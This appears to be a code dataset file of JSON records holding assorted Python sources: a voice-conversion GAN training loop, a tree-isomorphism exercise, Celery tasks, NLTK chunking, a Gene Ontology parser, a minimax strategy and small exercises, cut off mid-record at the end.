no_decay\n discriminator_learning_rate = 0.0001\n discriminator_learning_rate_decay = discriminator_learning_rate / no_decay\n sampling_rate = 16000\n num_mcep = 24\n frame_period = 5.0\n n_frames = 128\n \n lambda_cycle = 10\n lambda_identity = 5\n lambda_A2B = 3 # 1 is bad, 3~8 is good\n \n dic_sps_norm = {}\n dic_sps_mean = {}\n dic_sps_std = {}\n dic_f0s_mean = {}\n dic_f0s_std = {}\n\n print('Preprocessing Data...')\n\n start_time = time.time()\n \n for speaker in speaker_name_list:\n if not os.path.exists(os.path.join(model_dir, speaker + '.npz')):\n wavs = load_wavs(wav_dir = os.path.join(train_dir, speaker), sr = sampling_rate)\n f0s, timeaxes, sps, aps, coded_sps = world_encode_data(wavs = wavs, fs = sampling_rate, frame_period = frame_period, coded_dim = num_mcep)\n log_f0s_mean, log_f0s_std = logf0_statistics(f0s)\n coded_sps_transposed = transpose_in_list(lst = coded_sps)\n coded_sps_norm, coded_sps_mean, coded_sps_std = coded_sps_normalization_fit_transoform(coded_sps = coded_sps_transposed)\n np.savez(os.path.join(model_dir, speaker + '.npz'), coded_sps = coded_sps, f0s_mean = log_f0s_mean, f0s_std = log_f0s_std, sps_mean = coded_sps_mean, sps_std = coded_sps_std)\n dic_sps_mean[speaker] = coded_sps_mean\n dic_sps_std[speaker] = coded_sps_std\n dic_f0s_mean[speaker] = log_f0s_mean\n dic_f0s_std[speaker] = log_f0s_std\n else: \n npload = np.load(os.path.join(model_dir, speaker + '.npz'), allow_pickle = True)\n coded_sps = npload['coded_sps']\n dic_sps_mean[speaker] = npload['sps_mean']\n dic_sps_std[speaker] = npload['sps_std']\n dic_f0s_mean[speaker] = npload['f0s_mean']\n dic_f0s_std[speaker] = npload['f0s_std']\n coded_sps_transposed = transpose_in_list(lst = coded_sps)\n coded_sps_norm, _, _ = coded_sps_normalization_fit_transoform(coded_sps = coded_sps_transposed)\n \n dic_sps_norm[speaker] = coded_sps_norm \n \n print('Log Pitch', speaker)\n print('Mean: %f, Std: %f' %(dic_f0s_mean[speaker], dic_f0s_std[speaker]))\n \n coded_sps_norm_list = []\n for speaker in speaker_name_list:\n coded_sps_norm_list.append(dic_sps_norm[speaker])\n \n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n end_time = time.time()\n time_elapsed = end_time - start_time\n\n print('Preprocessing Done.')\n\n print('Time Elapsed for Data Preprocessing: %02d:%02d:%02d' % (time_elapsed // 3600, (time_elapsed % 3600 // 60), (time_elapsed % 60 // 1)))\n\n model = CCGAN(num_features = num_mcep, num_speakers = num_speakers)\n\n for epoch in range(num_epochs):\n print('Epoch: %d' % epoch) # 현재 에포크 출력\n\n start_time_epoch = time.time()\n n_samples, dataset_src, dataset_tar = sample_train_data_mix_all_mapping(coded_sps_norm_list, n_frames = 128)\n \n for sentence_idx in range(n_samples):\n for case_src in range(num_speakers):\n for case_tar in range(num_speakers):\n \n A_id = [0.]*num_speakers\n B_id = [0.]*num_speakers\n \n A_id[case_src] = 1.0\n B_id[case_tar] = 1.0\n \n mapping_direction = num_speakers * case_src + case_tar\n\n num_iterations = (num_speakers * num_speakers * n_samples * epoch) + (num_speakers * num_speakers * sentence_idx) + (num_speakers * case_src) + case_tar\n\n if num_iterations > id_mappig_loss_zero:\n lambda_identity = 0\n \n if num_iterations > no_decay: # iteration 이 넘어가면 선형감쇠 = 점점 조금 학습\n generator_learning_rate = max(0, generator_learning_rate - generator_learning_rate_decay)\n discriminator_learning_rate = max(0, discriminator_learning_rate - discriminator_learning_rate_decay)\n \n generator_loss, discriminator_loss = model.train(input_A = np.expand_dims(dataset_src[sentence_idx][mapping_direction], axis = 0), input_B = np.expand_dims(dataset_tar[sentence_idx][mapping_direction], axis = 0), lambda_cycle = lambda_cycle, lambda_identity = lambda_identity, lambda_A2B = lambda_A2B, generator_learning_rate = generator_learning_rate, discriminator_learning_rate = discriminator_learning_rate, A_id = A_id, B_id = B_id)\n\n if sentence_idx == 80 or sentence_idx == 161:\n print('Epoch: {:04d} Iteration: {:010d}, Generator Learning Rate: {:.8f}, Discriminator Learning Rate: {:.8f}'.format(epoch, num_iterations, generator_learning_rate, discriminator_learning_rate))\n print('src: {:s}, tar: {:s}, sent: {:d}, Generator Loss : {:.10f}, Discriminator Loss : {:.10f}'.format(speaker_name_list[case_src], speaker_name_list[case_tar], sentence_idx, generator_loss, discriminator_loss))\n\n if epoch % 50 == 0 and epoch != 0:\n model.save(directory = model_dir, filename = model_name) #모델저장\n\n end_time_epoch = time.time()\n time_elapsed_epoch = end_time_epoch - start_time_epoch\n\n print('Time Elapsed for This Epoch: %02d:%02d:%02d' % (time_elapsed_epoch // 3600, (time_elapsed_epoch % 3600 // 60), (time_elapsed_epoch % 60 // 1)))\n \n # validaiton is conducted for first speaker and last speaker of the speaker list\n # if you want full mapping validation, run convert_all.py\n \n if (epoch % 100 == 0 or epoch == num_epochs - 1) and epoch != 0:\n \n A_id_v = [0.]*num_speakers\n B_id_v = [0.]*num_speakers\n \n A_id_v[0] = 1.0\n B_id_v[-1] = 1.0\n \n src_v = speaker_name_list[0]\n tar_v = speaker_name_list[-1]\n \n log_f0s_mean_A = dic_f0s_mean[src_v]\n log_f0s_std_A = dic_f0s_std[src_v]\n coded_sps_A_mean = dic_sps_mean[src_v]\n coded_sps_A_std = dic_sps_std[src_v]\n \n log_f0s_mean_B = dic_f0s_mean[tar_v]\n log_f0s_std_B = dic_f0s_std[tar_v]\n coded_sps_B_mean = dic_sps_mean[tar_v]\n coded_sps_B_std = dic_sps_std[tar_v]\n \n if validation_dir is not None:\n validation_A_dir = os.path.join(validation_dir, src_v)\n \n if validation_A_dir is not None:\n validation_A_output_dir = os.path.join(output_dir, str(epoch)+'_'+src_v+'_to_'+tar_v)\n if not os.path.exists(validation_A_output_dir):\n os.makedirs(validation_A_output_dir)\n\n print('validaiton (SRC: %s, TAR: %s, epoch: %d)' %(src_v, tar_v, epoch))\n for file in os.listdir(validation_A_dir):\n filepath = os.path.join(validation_A_dir, file)\n wav, _ = librosa.load(filepath, sr = sampling_rate, mono = True)\n wav = wav_padding(wav = wav, sr = sampling_rate, frame_period = frame_period, multiple = 4)\n f0, timeaxis, sp, ap = world_decompose(wav = wav, fs = sampling_rate, frame_period = frame_period)\n f0_converted = pitch_conversion(f0 = f0, mean_log_src = log_f0s_mean_A, std_log_src = log_f0s_std_A, mean_log_target = log_f0s_mean_B, std_log_target = log_f0s_std_B)\n coded_sp = world_encode_spectral_envelop(sp = sp, fs = sampling_rate, dim = num_mcep)\n coded_sp_transposed = coded_sp.T\n coded_sp_norm = (coded_sp_transposed - coded_sps_A_mean) / coded_sps_A_std\n coded_sp_converted_norm = model.test(inputs = np.array([coded_sp_norm]),A_id = A_id_v, B_id = B_id_v)[0]\n coded_sp_converted = coded_sp_converted_norm * coded_sps_B_std + coded_sps_B_mean\n coded_sp_converted = coded_sp_converted.T\n coded_sp_converted = np.ascontiguousarray(coded_sp_converted)\n decoded_sp_converted = world_decode_spectral_envelop(coded_sp = coded_sp_converted, fs = sampling_rate)\n wav_transformed = world_speech_synthesis(f0 = f0_converted, decoded_sp = decoded_sp_converted, ap = ap, fs = sampling_rate, frame_period = frame_period)\n librosa.output.write_wav(os.path.join(validation_A_output_dir, os.path.basename(file)), wav_transformed, sampling_rate)\n \n A_id_v = [0.]*num_speakers\n B_id_v = [0.]*num_speakers\n \n A_id_v[-1] = 1.0\n B_id_v[0] = 1.0\n \n src_v = speaker_name_list[-1]\n tar_v = speaker_name_list[0]\n \n log_f0s_mean_A = dic_f0s_mean[src_v]\n log_f0s_std_A = dic_f0s_std[src_v]\n coded_sps_A_mean = dic_sps_mean[src_v]\n coded_sps_A_std = dic_sps_std[src_v]\n \n log_f0s_mean_B = dic_f0s_mean[tar_v]\n log_f0s_std_B = dic_f0s_std[tar_v]\n coded_sps_B_mean = dic_sps_mean[tar_v]\n coded_sps_B_std = dic_sps_std[tar_v]\n \n if validation_dir is not None:\n validation_A_dir = os.path.join(validation_dir, src_v)\n \n if validation_A_dir is not None:\n validation_A_output_dir = os.path.join(output_dir, str(epoch)+'_'+src_v+'_to_'+tar_v)\n if not os.path.exists(validation_A_output_dir):\n os.makedirs(validation_A_output_dir)\n\n print('validaiton (SRC: %s, TAR: %s, epoch: %d)' %(src_v, tar_v, epoch))\n for file in os.listdir(validation_A_dir):\n filepath = os.path.join(validation_A_dir, file)\n wav, _ = librosa.load(filepath, sr = sampling_rate, mono = True)\n wav = wav_padding(wav = wav, sr = sampling_rate, frame_period = frame_period, multiple = 4)\n f0, timeaxis, sp, ap = world_decompose(wav = wav, fs = sampling_rate, frame_period = frame_period)\n f0_converted = pitch_conversion(f0 = f0, mean_log_src = log_f0s_mean_A, std_log_src = log_f0s_std_A, mean_log_target = log_f0s_mean_B, std_log_target = log_f0s_std_B)\n coded_sp = world_encode_spectral_envelop(sp = sp, fs = sampling_rate, dim = num_mcep)\n coded_sp_transposed = coded_sp.T\n coded_sp_norm = (coded_sp_transposed - coded_sps_A_mean) / coded_sps_A_std\n coded_sp_converted_norm = model.test(inputs = np.array([coded_sp_norm]),A_id = A_id_v, B_id = B_id_v)[0]\n coded_sp_converted = coded_sp_converted_norm * coded_sps_B_std + coded_sps_B_mean\n coded_sp_converted = coded_sp_converted.T\n coded_sp_converted = np.ascontiguousarray(coded_sp_converted)\n decoded_sp_converted = world_decode_spectral_envelop(coded_sp = coded_sp_converted, fs = sampling_rate)\n wav_transformed = world_speech_synthesis(f0 = f0_converted, decoded_sp = decoded_sp_converted, ap = ap, fs = sampling_rate, frame_period = frame_period)\n librosa.output.write_wav(os.path.join(validation_A_output_dir, os.path.basename(file)), wav_transformed, sampling_rate)\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(description = 'Train CCGAN model for datasets.')\n \n speaker_name_list_default = ['SF1', 'SF2', 'SF3', 'SM1', 'SM2', 'TF1', 'TF2', 'TM1', 'TM2', 'TM3']\n num_epochs_default = 251\n train_dir_default = './data/vcc2016_training/'\n model_dir_default = './model'\n model_name_default = 'CCGAN.ckpt'\n random_seed_default = 0\n validation_dir_default = './data/evaluation_all/'\n output_dir_default = './validation_output'\n tensorboard_log_dir_default = './log'\n \n parser.add_argument('--speaker_name_list', type = str, nargs='+', help = 'Speaker Name List.', default = speaker_name_list_default)\n parser.add_argument('--num_epochs', type = int, help = 'Number of Epoch.', default = num_epochs_default)\n parser.add_argument('--train_dir', type = str, help = 'Directory for training.', default = train_dir_default)\n parser.add_argument('--validation_dir', type = str, help = 'If set none, no conversion would be done during the training.', default = validation_dir_default)\n parser.add_argument('--model_dir', type = str, help = 'Directory for saving models.', default = model_dir_default)\n parser.add_argument('--model_name', type = str, help = 'File name for saving model.', default = model_name_default)\n parser.add_argument('--random_seed', type = int, help = 'Random seed for model training.', default = random_seed_default)\n parser.add_argument('--output_dir', type = str, help = 'Output directory for converted validation voices.', default = output_dir_default)\n parser.add_argument('--tensorboard_log_dir', type = str, help = 'TensorBoard log directory.', default = tensorboard_log_dir_default)\n\n argv = parser.parse_args()\n\n speaker_name_list = argv.speaker_name_list\n num_epochs = argv.num_epochs\n train_dir = argv.train_dir\n model_dir = argv.model_dir\n model_name = argv.model_name\n random_seed = argv.random_seed\n validation_dir = None if argv.validation_dir == 'None' or argv.validation_dir == 'none' else argv.validation_dir\n output_dir = argv.output_dir\n tensorboard_log_dir = argv.tensorboard_log_dir\n \n train(speaker_name_list, num_epochs, train_dir, validation_dir, model_dir, model_name, random_seed, output_dir, tensorboard_log_dir) \n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"244939093","text":"\n\nclass TreeNode():\n def __init__(self,ch,left,right):\n self.ch=ch\n self.left=left\n self.right=right\n\ndef main():\n m1,tr1= TreeBuild()\n m2,tr2= TreeBuild()\n\n if isOmorphic(tr1,m1,tr2,m2):\n print('Yes')\n else:\n print('No')\n\ndef TreeBuild():\n n = int(input())\n m=0\n check = []\n tNode = []\n for i in range(n):\n check.append(0)\n\n for i in range(n):\n line = input()\n ch,left,right=[k for k in line.split(' ')]\n tmp = TreeNode(ch,left,right)\n if left == '-':\n tmp.left=-1\n else:\n tmp.left=int(left)\n check[tmp.left] = 1\n if right =='-':\n tmp.right=-1\n else:\n tmp.right=int(right)\n check[tmp.right]=1\n tNode.append(tmp)\n\n for i in range(n):\n if check[i]==0:\n m=i\n break\n return m,tNode\n\ndef isOmorphic(tnode1,root1,tnode2,root2):\n if root1==-1 and root2 == -1:\n return 1\n if (root1==-1 and root2 != -1) or (root1 != -1 and root2 == -1):\n return 0\n if tnode1[root1].ch != tnode2[root2].ch:\n return 0\n\n t1 = isOmorphic(tnode1,tnode1[root1].left,tnode2,tnode2[root2].left) and isOmorphic(tnode1,tnode1[root1].right,tnode2,tnode2[root2].right)\n t2 = isOmorphic(tnode1,tnode1[root1].right,tnode2,tnode2[root2].left) and isOmorphic(tnode1,tnode1[root1].left,tnode2,tnode2[root2].right)\n return t1 or t2\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"03-树1 树的同构 (25分).py","file_name":"03-树1 树的同构 (25分).py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"28546682","text":"\"\"\"celery task\n\"\"\"\n# Django\nfrom django.conf import settings\nfrom django.template.loader import render_to_string\nfrom django.utils import timezone\nfrom django.core.mail import EmailMultiAlternatives\n\n#celery\nfrom celery.decorators import task, periodic_task\n\n#models\nfrom cride.users.models import User\nfrom cride.rides.models import Ride\n\n#utils\nimport jwt\nfrom datetime import timedelta\nimport time\n\ndef gen_verification_token(user):\n\t\"\"\" Create JWT token that the user can user to verify its account.\"\"\"\n\texp_date = timezone.now() + timedelta(days=3)\n\tpayload = {\n\t\t'user' : user.username,\n\t\t'exp' : int(exp_date.timestamp()),\n\t\t'type' : 'email_confirmation'\n\t}\n\ttoken = jwt.encode(payload, settings.SECRET_KEY, algorithm='HS256')\n\t# token is a byte. Decode is not from jwt\n\treturn token.decode()\n\n@task(name='send_confirmation_email', max_retries=3)\ndef send_confirmation_email(user_pk):\n\t\"\"\" Send account verification link to given user \"\"\"\n\t\n\tfor i in range(30):\n\t\ttime.sleep(1)\n\t\tprint('Sleeping', str(i+1))\n\n\tuser = User.objects.get(pk=user_pk)\n\tverification_token = gen_verification_token(user)\n\n\tsubject = 'Welcome @{}! Verify yout account to start using Comparte Ride'.format(user.username)\n\tfrom_email = 'Comparte Ride '\n\tcontent = render_to_string(\n\t\t'emails/users/account_verification.html', \n\t\t{'token': verification_token, 'user': user}\n\t)\n\tmsg = EmailMultiAlternatives(subject, content, from_email, [user.email])\n\tmsg.attach_alternative(content, \"text/html\")\n\tmsg.send()\n\t\n\tprint(\"Sending email\")\n\n@periodic_task(name='disable_finished_rides', run_every=timedelta(minutes=20))\ndef disable_finished_rides():\n\t\"\"\"Disable finished rides.\"\"\"\n\tnow = timezone.now()\n\toffset = now + timedelta(minutes=20)\n\n\t# Update rides that have already finished\n\trides = Ride.objects.filter(\n\t\tarrival_date__gte=now,\n\t\tarrival_date__lte=offset,\n\t\tis_active=True\n\t)\n\trides.update(is_active=False)","sub_path":"cride/taskapp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"409835553","text":"import re\n\nstandard = [\"arabic\", \"roman\", \"Roman\", \"alph\", \"Alph\", \"hex\", \"binary\", \"oct\"]\t\t #the standard defined pagenumber styles in latex\n\n\n\"\"\"This function is used to search for a specific pagenumber style,\nin the file page_numbering.tex, if the style does not exist,\nit returns arabic\"\"\"\ndef search_styles(style):\n\tif style == \"\":\t\t #if not style is defined just return arabic\n\t\tstyle = \"arabic\"\n\telse:\n\t\tlist_styles = getStyles()\n\t\tif style not in list_styles:\t\t#check if the style is in the list\n\t\t\tstyle = \"arabic\"\t\t#if not return arabic\n\tif style == \"hex\":\n\t\tstyle = \"hexX\"\n\telif style == \"binary\":\n\t\tstyle = \"binaryX\"\n\telif style == \"oct\":\n\t\tstyle = \"octX\"\n\treturn style\t\t#otherwise return the style\n\ndef getStyles():\n\tf_style = open(\"Resources/page_numbering.tex\", 'r')\t\t #open the tex file for reading only\n\ttext = f_style.read()\n\tlist_styles = re.findall('\\@\\w*}',text)\t #use a regular expressions to get the strings where a specific combination of chars occur\n\tfor i in range(len(list_styles)):\t\t #go through the list of strings found\n\t\tlist_styles[i] = list_styles[i][1:len(list_styles[i])-1]\t\t#remove the first char from all entries in the list\n\t\t\n\treturn list_styles + standard\t\t #concat the list with the standard pagenumber style\n\t","sub_path":"auxiliary.py","file_name":"auxiliary.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"220249362","text":"import os\nimport errno\nfrom pathlib import Path\nfrom dataclasses import dataclass, field\n\nfrom .loaders import dispatch_loader\nfrom .savers import dispatch_saver\n\n\ndef create_safely(new_dir: Path):\n \"\"\"\n Create directory sagely\n Args:\n new_dir: path to dir\n\n Returns:\n None\n \"\"\"\n if os.path.isdir(new_dir):\n pass\n else:\n try:\n os.mkdir(new_dir)\n except FileExistsError as e:\n if e != errno.EEXIST:\n raise e\n\n\ndef _dump_(self, path: Path, postfix: str):\n name = self.__class__.__name__ + str(postfix)\n attrs = self.__dict__\n annos = self.__annotations__\n anno_attr = {key: (annos[key], attrs[key]) for key in attrs.keys() if key in annos}\n new_dir = path / name\n create_safely(new_dir)\n return [dispatch_saver(value, new_dir / attr_name) for attr_name, (cls, value) in anno_attr.items()]\n\n\ndef _load_(cls, path: Path, postfix: str):\n name = cls.__name__ + str(postfix)\n annos = cls.__annotations__\n new_dir = path / name\n kwargs_loaded = {attr_name: dispatch_loader(attr_cls, new_dir / attr_name)\n for attr_name, attr_cls in annos.items()}\n return cls(**kwargs_loaded)\n\n\ndef dump(self, path: Path, postfix: str=''):\n \"\"\"\n Roughly, this functions saves @dataclass-annotated object into object.__class__.__name__ folder\n Args:\n path: path to save data\n data: any @dataclass - decorated class\n postfix: str, postfix # TODO: or callable\n\n Returns:\n list of str/None, depends on saver return type\n \"\"\"\n return self._dump_(path, postfix)\n\n\ndef load(cls, path: Path, postfix: str=''):\n \"\"\"\n Load dumped object\n Args:\n cls:\n path:\n postfix:\n\n Returns:\n Any savable/loadable object\n \"\"\"\n return cls._load_(path, postfix)\n\n\ndef databox(_cls=None, *, init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False):\n \"\"\"\n decorator which adds save and load methods to the @dataclass - decorated classes\n Args:\n _cls: class to decorate\n init: whether implement or not __init__\n repr: ... __repr__\n eq: ... __eq__\n order: ... comparison methods\n unsafe_hash: ... __hash__\n frozen:\n\n Returns:\n Decorated class _cls\n \"\"\"\n data_cls = dataclass(_cls=_cls, init=init, repr=repr, eq=eq, order=order,\n unsafe_hash=unsafe_hash, frozen=frozen)\n data_cls = type(data_cls.__name__, (data_cls,),\n {'_load_': classmethod(_load_), '_dump_': _dump_,\n 'load': classmethod(load), 'dump': dump})\n return data_cls\n\n\ndef purge():\n raise NotImplementedError\n\n\n","sub_path":"databox/data_model.py","file_name":"data_model.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"387767887","text":"import nltk\nfrom nltk.corpus import state_union\nfrom nltk.tokenize import PunktSentenceTokenizer\n\ntrain_text = state_union.raw(\"2005-GWBush.txt\")\nsample_text = \"Hey ,pracheta is speaking to puchka .\\nHow are you Siddhi?\\nI'm good puchka\"\n\n\ncustom_sent_tokenizer = PunktSentenceTokenizer(train_text)\nprint(type(custom_sent_tokenizer))\ntokenized = custom_sent_tokenizer.tokenize(sample_text)\nprint (tokenized)\n\ndef process_content():\n try:\n for i in tokenized:\n words = nltk.word_tokenize(i)\n tagged = nltk.pos_tag(words)\n\n \n \n ch=r\"\"\"Chunk: {<.*>+}\n }+{ \"\"\"\n chParser=nltk.RegexpParser(ch)\n chunked=chParser.parse(tagged)\n print(chunked)\n chunked.draw()\n \n \n except Exception as e:\n print(str(e))\n\nprocess_content()\n","sub_path":"Basics/Chinking.py","file_name":"Chinking.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"518306959","text":"import socket\n\n# TCP/IP socket\nsock_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nsock_obj.connect(('httpbin.org', 80))\nsock_obj.send(\"\"\"POST /post HTTP/1.1\nHost: httpbin.org\nAccept: */*\n\n{\n \"github\": \"MyNickName\",\n \"Name\": \"MyName\",\n \"Surname\": \"MySurname\"\n}\\n\\n\"\"\")\n\nresp = sock_obj.recv(1024)\nprint(resp)\n\n# Close the connection when completed\nsock_obj.close()","sub_path":"fortcdump.py","file_name":"fortcdump.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"29113425","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Author: Guewen Baconnier\n# Copyright 2014 Camptocamp SA\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom yuancloud.osv import orm\n\n\nclass sale_order(orm.Model):\n _inherit = 'sale.order'\n\n def _prepare_payment_move_line(self, cr, uid, move_name, sale, journal,\n period, amount, date, context=None):\n debit_line, credit_line = super(sale_order, self).\\\n _prepare_payment_move_line(cr, uid, move_name, sale, journal,\n period, amount, date, context=context)\n if sale.transaction_id:\n debit_line['transaction_ref'] = sale.transaction_id\n credit_line['transaction_ref'] = sale.transaction_id\n return debit_line, credit_line\n","sub_path":"yuancloud/extend/sale_payment_method_transaction_id/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112577011","text":"#!/usr/bin/python2\nfrom __future__ import print_function\n\nimport parse_obonet as opy2\nimport networkx\nimport pronto\nimport csv\nfrom cStringIO import StringIO\nimport gzip\n\n\"\"\"\nSignificant portion of the following code has been extracted from Daniel Himmelstein's\nGene-Ontology GitHub Page: https://github.com/dhimmel/gene-ontology\n\"\"\"\n\nbprocess_trnsl = {\"biological_process\":\"BiologicalProcess\",\n \"molecular_function\":\"MolecularFunction\",\n \"cellular_component\":\"CellularComponent\"}\n\nremove_subsets = {\n 'goantislim_grouping', # Grouping classes that can be excluded\n 'gocheck_do_not_annotate' # Term not to be used for direct annotation\n 'gocheck_do_not_manually_annotate', # Term not to be used for direct manual annotation\n}\n\npropagate_along = {'is_a', 'part_of'}\n\ndef get_go_annotations(obo_filename, gene2go_gz):\n graph = opy2.read_obo_file(obo_filename)\n print (networkx.info(graph))\n \n for u, v, key in graph.edges(data=False, keys=True):\n if key not in propagate_along:\n graph.remove_edge(u, v, key)\n\n remove_nodes = set()\n for node, data in graph.nodes(data=True):\n if remove_subsets & set(data.get('subset', [])):\n remove_nodes.add(node)\n\n print (networkx.info(graph))\n \n with gzip.open(gene2go_gz, 'rb') as f:\n g2g_file_content = f.read()\n\n dict_go = make_dict(g2g_file_content)\n\n for node, data in graph.nodes_iter(data=True):\n for annot in 'inferred_annotations', 'direct_annotations', 'direct_not_annotations':\n data[annot] = set()\n\n for go_id, gene_arr in dict_go.iteritems():\n for gene in gene_arr:\n gene_id = gene.split(\"|\")[0]\n qual = gene.split(\"|\")[1]\n if go_id not in graph:\n continue\n \n if qual != \"NOT\":\n graph.node[go_id]['direct_annotations'].add(gene_id)\n else:\n graph.node[go_id]['direct_not_annotations'].add(gene_id)\n\n propagate_annotations(graph)\n\n cat_dict = make_category_dict(obo_filename)\n\n fin_dict = {}\n for node, data in graph.nodes_iter(data=True):\n if node in remove_nodes:\n continue\n else:\n full_gene_set = data['inferred_annotations']|data['direct_annotations']\n fin_dict[node] = {\"genes\":full_gene_set,\n \"type\":bprocess_trnsl[cat_dict[node]]}\n\n return fin_dict\n\ndef process_annotations_spoke(ann_dict, obo_file, gene2go_gz, category):\n with gzip.open(gene2go_gz, 'rb') as f:\n g2g_file_content = f.read()\n \n go_obo = pronto.Ontology(obo_file)\n evi_dict = get_evidence(g2g_file_content)\n\n node_dict = dict()\n rel_dict = dict()\n\n count_rels = 0\n count_gene_all = 0\n\n for ago in ann_dict.keys():\n gene_arr = ann_dict[ago][\"genes\"]\n if ann_dict[ago][\"type\"] == category:\n if len(gene_arr) > 1 and len(gene_arr) < 1001:\n count_rels = count_rels + len(list(set(gene_arr)))\n for g in gene_arr:\n cat_id = str(g.split(\"|\")[0]) + \"|\" + ago\n count_gene_all += 1\n if cat_id in evi_dict.keys():\n evidence = evi_dictp[cat_id]\n else:\n evidence = \"Inferred\"\n rel_dict[cat_id] = {\"evidence\":evidence,\n \"source\":\"NCBI gene2go\"}\n desc = str(go_obo[ago].desc)\n for replace in '\"', '\\\\':\n desc = desc.replace(replace, \"\")\n url = \"http://purl.obolibrary.org/obo/\" + ago.replace(\"GO:\", \"GO_\")\n node_dict[ago] = {\"name\":go_obo[ago].name,\n \"desc\":desc,\n \"url\":url}\n return node_dict, rel_dict, count_rels\n \ndef propagate_annotations(graph):\n \"\"\"Infer annotations through propagations\"\"\"\n for node in networkx.topological_sort(graph):\n data = graph.node[node]\n inferred = data['inferred_annotations']\n inferred -= data['direct_not_annotations']\n inferred |= data['direct_annotations']\n for subsuming_node in graph.successors(node):\n subsuming_data = graph.node[subsuming_node]\n subsuming_data['inferred_annotations'] |= inferred\n\ndef make_category_dict(obo_file):\n cat_dict = dict()\n go_obo = pronto.Ontology(obo_file)\n for term in go_obo:\n go_id = term.id\n go_cat = term.other['namespace'][0]\n cat_dict[go_id] = go_cat\n return cat_dict\n\ndef get_evidence(gene2go):\n open_g2g = StringIO(gene2go)\n next(open_g2g)\n ev_dict = dict()\n\n reader = csv.reader(open_g2g, delimiter='\\t')\n for line in reader:\n if line[1].strip() == '9606':\n gene_id = line[1].strip()\n go_id = line[2].strip()\n concat_id = gene_id + \"|\" + go_id\n evidence = line[3].strip()\n ev_dict[concat_id] = evidence\n return ev_dict\n\ndef make_dict(g2g_file, type_go=None):\n dict_go = dict()\n open_g2g = StringIO(g2g_file)\n reader = csv.reader(open_g2g, delimiter = '\\t')\n for line in reader:\n # line[0].strip() == \"9606\" and\n if type_go:\n if line[0].strip() == '9606' and line[7].strip() == type_go:\n go_id = line[2].strip()\n gene_id = line[1].strip() + \"|\" + line[4].upper().strip()\n if not go_id in dict_go:\n dict_go[go_id] = [gene_id]\n else:\n dict_go[go_id].append(gene_id)\n else:\n if line[0].strip() == '9606':\n go_id = line[2].strip()\n gene_id = line[1].strip() + \"|\" + line[4].upper().strip()\n if not go_id in dict_go:\n dict_go[go_id] = [gene_id]\n else:\n dict_go[go_id].append(gene_id)\n return dict_go\n","sub_path":"update/parsers/Make_GO_Annotations_rbvi.py","file_name":"Make_GO_Annotations_rbvi.py","file_ext":"py","file_size_in_byte":5986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"40614332","text":"import random\nfrom strategy import Strategy\n\n\nclass StrategyMinimax(Strategy):\n ''' Interface to suggest random moves.\n '''\n\n def suggest_move(self, state, depth=3):\n moves = state.possible_next_moves()\n max_outcome = -10000\n suggest_move = None\n for move in moves:\n if state.apply_move(move).over:\n return move\n minimax_outcome = self.minimax_outcome(state, move, p=state.next_player, level=1, depth=depth)\n if minimax_outcome > max_outcome:\n max_outcome = minimax_outcome\n suggest_move = move\n return suggest_move\n\n\n def minimax_outcome(self, state, move, p, level=1, depth=3):\n if level > depth:\n return 0\n next_state = state.apply_move(move)\n if next_state.over:\n if next_state.next_player == p:\n return next_state.outcome()\n else:\n return -next_state.outcome()\n moves = next_state.possible_next_moves()\n total_outcome = 0\n for new_move in moves:\n total_outcome += self.minimax_outcome(next_state, new_move, p=p, level=level+1)\n return total_outcome\n\n","sub_path":"tippy_minimax/strategy_minimax.py","file_name":"strategy_minimax.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"403224511","text":"\"\"\"\nExercise 10: Change Brad’s salary to 8500 from a given Python 8_dictionary\nsampleDict = {\n 'emp1': {'name': 'Jhon', 'salary': 7500},\n 'emp2': {'name': 'Emma', 'salary': 8000},\n 'emp3': {'name': 'Brad', 'salary': 6500}\n}\nExpected output:\n\nsampleDict = {\n 'emp1': {'name': 'Jhon', 'salary': 7500},\n 'emp2': {'name': 'Emma', 'salary': 8000},\n 'emp3': {'name': 'Brad', 'salary': 8500}\n}\n\"\"\"\nsampleDict = {\n 'emp1': {'name': 'Jhon', 'salary': 7500},\n 'emp2': {'name': 'Emma', 'salary': 8000},\n 'emp3': {'name': 'Brad', 'salary': 8500}\n}\n\n\ndef update_salary(employee_name, salary):\n for emp in sampleDict.values():\n if emp.get(\"name\") == employee_name:\n emp[\"salary\"] = salary\n return sampleDict\n\n\nprint(update_salary(\"Brad\", 